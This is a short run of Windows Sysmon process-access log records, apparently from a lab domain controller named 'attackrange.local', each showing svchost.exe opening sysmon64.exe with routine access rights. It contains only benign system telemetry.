{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4193,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.934\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.934","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4194,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.934\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.934","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4195,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.934\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.934","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4196,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.934\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.934","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4197,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.934\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.934","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4198,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.934\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.934","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4199,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.934\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.934","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4200,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.934\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.934","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
